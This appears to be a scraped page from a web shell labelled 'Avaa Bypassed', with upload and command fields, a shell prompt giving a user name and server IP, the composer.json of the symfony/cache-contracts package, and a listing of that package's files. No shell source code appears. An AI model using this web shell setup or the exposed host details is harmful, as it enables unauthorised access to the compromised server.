404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@18.222.161.119: ~ $
{
    "name": "symfony/cache-contracts",
    "type": "library",
    "description": "Generic abstractions related to caching",
    "keywords": ["abstractions", "contracts", "decoupling", "interfaces", "interoperability", "standards"],
    "homepage": "https://symfony.com",
    "license": "MIT",
    "authors": [
        {
            "name": "Nicolas Grekas",
            "email": "p@tchwork.com"
        },
        {
            "name": "Symfony Community",
            "homepage": "https://symfony.com/contributors"
        }
    ],
    "require": {
        "php": ">=8.1",
        "psr/cache": "^3.0"
    },
    "suggest": {
        "symfony/cache-implementation": ""
    },
    "autoload": {
        "psr-4": { "Symfony\\Contracts\\Cache\\": "" }
    },
    "minimum-stability": "dev",
    "extra": {
        "branch-alias": {
            "dev-main": "3.3-dev"
        },
        "thanks": {
            "name": "symfony/contracts",
            "url": "https://github.com/symfony/contracts"
        }
    }
}

Filemanager

Name Type Size Permission Actions
CHANGELOG.md File 157 B 0644
CacheInterface.php File 2.25 KB 0644
CacheTrait.php File 2.41 KB 0644
CallbackInterface.php File 832 B 0644
ItemInterface.php File 1.75 KB 0644
LICENSE File 1.04 KB 0644
README.md File 326 B 0644
TagAwareCacheInterface.php File 1011 B 0644
composer.json File 1013 B 0644